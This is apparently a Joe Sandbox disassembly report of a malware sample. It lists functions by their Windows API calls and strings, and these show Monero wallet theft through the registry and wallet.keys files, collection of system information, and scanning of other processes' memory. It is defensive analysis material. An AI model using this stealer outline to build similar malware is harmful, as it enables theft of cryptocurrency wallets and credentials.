Part of subcall function 000905C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000975E9,000B66DA), ref: 000905F5
Part of subcall function 000905C7: lstrcatA.KERNEL32(?,?), ref: 000905FF

CopyFileA.KERNEL32(?,?,00000001), ref: 00081C2A

Part of subcall function 00090519: lstrcpyA.KERNEL32(00000000,?,?,00081D07,?,00097621), ref: 00090538

Part of subcall function 00087FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0008E756,?,?,?), ref: 00087FC7
Part of subcall function 00087FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0008E756,?,?,?), ref: 00087FDE
Part of subcall function 00087FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0008E756,?,?,?), ref: 00087FF5
Part of subcall function 00087FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0008E756,?,?,?), ref: 0008800C
Part of subcall function 00087FAC: CloseHandle.KERNEL32(?,?,?,?,?,0008E756,?,?,?), ref: 00088034

DeleteFileA.KERNEL32(?), ref: 00081C9D

Part of subcall function 00096E97: CreateThread.KERNEL32(00000000,00000000,00096DC6,?,00000000,00000000), ref: 00096F36
Part of subcall function 00096E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00096F3E

Strings

.keys, xrefs: 00081B0D
\Monero\wallet.keys, xrefs: 00081B2F

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$lstrcat$AllocCloseCreateHeaplstrlen$CopyDeleteHandleLocalObjectOpenProcessQueryReadSingleSizeSystemThreadTimeValueWait_memset
String ID: .keys$\Monero\wallet.keys
API String ID: 615783205-3586502688
Opcode ID: decdb58e25cd0b8e4ae0e0c8735eb8d4a9033c921c77be16c52c20137f966af1
Instruction ID: 8beea851e1b040ca174e387ce832de316c19568f8e2cbf58e2b3039b77bb589e
Opcode Fuzzy Hash: decdb58e25cd0b8e4ae0e0c8735eb8d4a9033c921c77be16c52c20137f966af1
Instruction Fuzzy Hash: B451C771D9012D9BCF11BB64EC46ADD73B8AF04304F4144A1F648B7152DA30AE8A9F95

Function 00095DF7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 120stringCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(?,?,00000000,?), ref: 00095E86

Part of subcall function 00091DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00091DFD

lstrcatA.KERNEL32(?,00000000), ref: 00095EA3
lstrcatA.KERNEL32(?,?), ref: 00095EC2
lstrcatA.KERNEL32(?,?), ref: 00095ED6
lstrcatA.KERNEL32(?), ref: 00095EE9
lstrcatA.KERNEL32(?,?), ref: 00095EFD
lstrcatA.KERNEL32(?), ref: 00095F10

Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D

Part of subcall function 00091D92: GetFileAttributesA.KERNEL32(?,?,?,0008DA7F,?,?,?), ref: 00091D99

Part of subcall function 00095B0B: GetProcessHeap.KERNEL32(00000000,0098967F,?,?,?), ref: 00095B30
Part of subcall function 00095B0B: HeapAlloc.KERNEL32(00000000), ref: 00095B37
Part of subcall function 00095B0B: wsprintfA.USER32 ref: 00095B50
Part of subcall function 00095B0B: FindFirstFileA.KERNEL32(?,?), ref: 00095B67
Part of subcall function 00095B0B: StrCmpCA.SHLWAPI(?,000B6A98), ref: 00095B88
Part of subcall function 00095B0B: StrCmpCA.SHLWAPI(?,000B6A9C), ref: 00095BA2
Part of subcall function 00095B0B: wsprintfA.USER32 ref: 00095BC9
Part of subcall function 00095B0B: CopyFileA.KERNEL32(?,?,00000001), ref: 00095C86
Part of subcall function 00095B0B: DeleteFileA.KERNEL32(?), ref: 00095CA9

Strings

Lz, xrefs: 00095FC2

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: lstrcat$File$Heapwsprintf$AllocAttributesCopyDeleteFindFirstFolderPathProcesslstrcpy
String ID: Lz
API String ID: 1546541418-718111854
Opcode ID: c2cc0ad8514e45f93b68d690b122edfa36d0b00a9eb0f28c1d455bb168a1ea42
Instruction ID: c22f8d4e3d4713a92d8db851136335136faf2c8201d4d82ed58f22ed7020b21c
Opcode Fuzzy Hash: c2cc0ad8514e45f93b68d690b122edfa36d0b00a9eb0f28c1d455bb168a1ea42
Instruction Fuzzy Hash: 6051C7B1E0011C9BCF55DB64DC89ADDB7B9AB4C310F8144E6EA09E3251EA30AF898F54

Function 0009F944 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 77COMMON

Download Yara Rule

APIs

UnDecorator::getArgumentList.LIBCMT ref: 0009F969

Part of subcall function 0009F504: Replicator::operator[].LIBCMT ref: 0009F587
Part of subcall function 0009F504: DName::operator+=.LIBCMT ref: 0009F58F

DName::operator+.LIBCMT ref: 0009F9C2
DName::DName.LIBCMT ref: 0009FA1A

Strings

void, xrefs: 0009FA12
..., xrefs: 0009F9FD, 0009FA09
,<ellipsis>, xrefs: 0009F9B5
,..., xrefs: 0009F9AE, 0009F9BA
<ellipsis>, xrefs: 0009FA04

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
String ID: ,...$,<ellipsis>$...$<ellipsis>$void
API String ID: 834187326-2211150622
Opcode ID: 3ae0587f9760104ceffed54faf6f93c109bfca98553ce9b08bb3cb482f0288de
Instruction ID: d4d7f60e1bba30e13d91510ba9933e91346612d131abedd106c6f596819fd7c2
Opcode Fuzzy Hash: 3ae0587f9760104ceffed54faf6f93c109bfca98553ce9b08bb3cb482f0288de
Instruction Fuzzy Hash: 1E21B030201606AFDF15DF1CE840AB97BF0EB05348B18826BE849CB36ADB34ED02DB50

Function 000A12DD Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

UnDecorator::UScore.LIBCMT ref: 000A12E7
DName::DName.LIBCMT ref: 000A12F3

Part of subcall function 0009EFBE: DName::doPchar.LIBCMT ref: 0009EFEF

UnDecorator::getScopedName.LIBCMT ref: 000A1332
DName::operator+=.LIBCMT ref: 000A133C
DName::operator+=.LIBCMT ref: 000A134B
DName::operator+=.LIBCMT ref: 000A1357
DName::operator+=.LIBCMT ref: 000A1364

Strings

void, xrefs: 000A1343

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
String ID: void
API String ID: 1480779885-3531332078
Opcode ID: a38e1422f466bed39a087660c02447f37050bb8c353e6e6b5283f8b3c7256793
Instruction ID: 2e6e0a380de2b27a5da5297f46f9fb1eb22301ada0fa78a46b2a6bff5849e68d
Opcode Fuzzy Hash: a38e1422f466bed39a087660c02447f37050bb8c353e6e6b5283f8b3c7256793
Instruction Fuzzy Hash: 4D118272500144AFDF05EFA8C856AFE7FA4AF11714F4441A9E4169B2E7DB70AB44C750

Function 00091563 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 00091575
GetDeviceCaps.GDI32(00000000,00000008), ref: 00091580
GetDeviceCaps.GDI32(00000000,0000000A), ref: 0009158B
ReleaseDC.USER32(00000000,00000000), ref: 00091596
GetProcessHeap.KERNEL32(00000000,00000104,?,?,00094098,?,Display Resolution: ,000B68F4,00000000,User Name: ,000B68E4,00000000,Computer Name: ,000B68D0,AV: ,000B68C4), ref: 000915A2
HeapAlloc.KERNEL32(00000000,?,?,00094098,?,Display Resolution: ,000B68F4,00000000,User Name: ,000B68E4,00000000,Computer Name: ,000B68D0,AV: ,000B68C4,Install Date: ), ref: 000915A9
wsprintfA.USER32 ref: 000915BB

Part of subcall function 000904E7: lstrcpyA.KERNEL32(00000000,00000000,?,0009707B,000B66CD,?,?,?,?,0009858F), ref: 0009050D

Strings

%dx%d, xrefs: 000915B5

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: CapsDeviceHeap$AllocCreateProcessReleaselstrcpywsprintf
String ID: %dx%d
API String ID: 3940144428-2206825331
Opcode ID: 9a4ff0430a5e43e6642005f397eea05d819af2e6b108d28053b44e1f7696fef8
Instruction ID: 826c1d3f1d85035e3b2ebea3863e3ec2417e352860ff9fb73148bca9ad663591
Opcode Fuzzy Hash: 9a4ff0430a5e43e6642005f397eea05d819af2e6b108d28053b44e1f7696fef8
Instruction Fuzzy Hash: 72F06872D42220BBEB203BA5FC4DDDB7F6CEF46BE5B014452F605DA161D6B15D1087A0

Function 000A660D Relevance: 13.6, APIs: 9, Instructions: 64COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 000A6634
_free.LIBCMT ref: 000A6642
_free.LIBCMT ref: 000A664D
_free.LIBCMT ref: 000A6621

Part of subcall function 0009D93B: HeapFree.KERNEL32(00000000,00000000,?,0009D18F,00000000,000BB6F4,0009D1D6,0008EEBE,?,?,0009D2C0,000BB6F4,?,?,000AEC38,000BB6F4), ref: 0009D951
Part of subcall function 0009D93B: GetLastError.KERNEL32(?,?,?,0009D2C0,000BB6F4,?,?,000AEC38,000BB6F4,?,?,?), ref: 0009D963

___free_lc_time.LIBCMT ref: 000A666B
_free.LIBCMT ref: 000A6676
_free.LIBCMT ref: 000A669B
_free.LIBCMT ref: 000A66B2
_free.LIBCMT ref: 000A66C1

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lc_time
String ID:
API String ID: 3704779436-0
Opcode ID: c211b1c8926220c1336b28ddbbeb6d787029ebf7d4ec53d91b14a700d3a0e58c
Instruction ID: 15fe73f144f8aea1baed0bbe7e2df1523f9e79d730e022212c73ddc428772c08
Opcode Fuzzy Hash: c211b1c8926220c1336b28ddbbeb6d787029ebf7d4ec53d91b14a700d3a0e58c
Instruction Fuzzy Hash: C01191B2140301ABDF207FF5C885A9AF3F5AB02708F18093FF14A97102CA369941CB10

Function 0008FB2D Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 159COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00064000,?,?,?), ref: 0008FB52
OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 0008FB7E
_memset.LIBCMT ref: 0008FBC1
??_V@YAXPAX@Z.MSVCRT(?), ref: 0008FD17

Part of subcall function 0008F030: _memmove.LIBCMT ref: 0008F04A

Strings

N0ZWFt, xrefs: 0008FC7E

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: OpenProcess_memmove_memset
String ID: N0ZWFt
API String ID: 2647191932-431618156
Opcode ID: 41af2b86e4f5207a3b0b4b4cb13b6a52e0765865f03f809031358b0856c1ba06
Instruction ID: e34e71efe39f901cf3d7e1adaa97613a8e1503da63d0227493fa8cd76df77372
Opcode Fuzzy Hash: 41af2b86e4f5207a3b0b4b4cb13b6a52e0765865f03f809031358b0856c1ba06
Instruction Fuzzy Hash: 0451ADB1D002299FDB20AB60CD85BEDB7B9BB44304F0001F9A249A7253EA756FC8CF55

Function 0008F915 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00000000,?,00000000,00000000,?,?,?,?,?,0008FBE3,?,00000000,00000000,?,?), ref: 0008F934
VirtualQueryEx.KERNEL32(?,00000000,?,0000001C,?,?,?,?,?,?,?,?,0008FBE3,?,00000000,00000000), ref: 0008F95E
ReadProcessMemory.KERNEL32(?,00000000,?,00064000,00000000,?,?,?,?,?,?,?,?), ref: 0008F9AB
ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0008FA04
VirtualQueryEx.KERNEL32(?,?,?,0000001C), ref: 0008FA5C
??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0008FBE3,?,00000000,00000000,?,?), ref: 0008FA6D

Strings

@, xrefs: 0008F977

Memory Dump Source

Source File: 00000000.00000002.2314013691.0000000000081000.00000080.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true

Associated: 00000000.00000002.2313999161.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314042036.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314085201.00000000000BD000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000E3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000000F4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000101000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000001D2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000213000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000021A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000221000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000228000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000239000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000240000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.0000000000253000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.000000000025F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314111338.00000000002DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314877045.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_80000_noll.jbxd

Yara matches

Similarity

API ID: MemoryProcessQueryReadVirtual
String ID: @
API String ID: 3835927879-2766056989
Opcode ID: 58a5e4862f0da5971e7c4e0059d277af537eee2873a15bfd1efd10ab1d2d1062
Instruction ID: 22c6bc068c63a3e083e5b2a6beda50e774aed998fbc85cb7dc62c1315e028902
Opcode Fuzzy Hash: 58a5e4862f0da5971e7c4e0059d277af537eee2873a15bfd1efd10ab1d2d1062
Instruction Fuzzy Hash: DA418E72A0020ABBEF14AFB4CC49BEF7BB6FB44760F148035FA44A6190D7758951DB91

Function 00081A51 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 35registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00081A65
HeapAlloc.KERNEL32(00000000), ref: 00081A6C
RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,00081AE9), ref: 00081A89
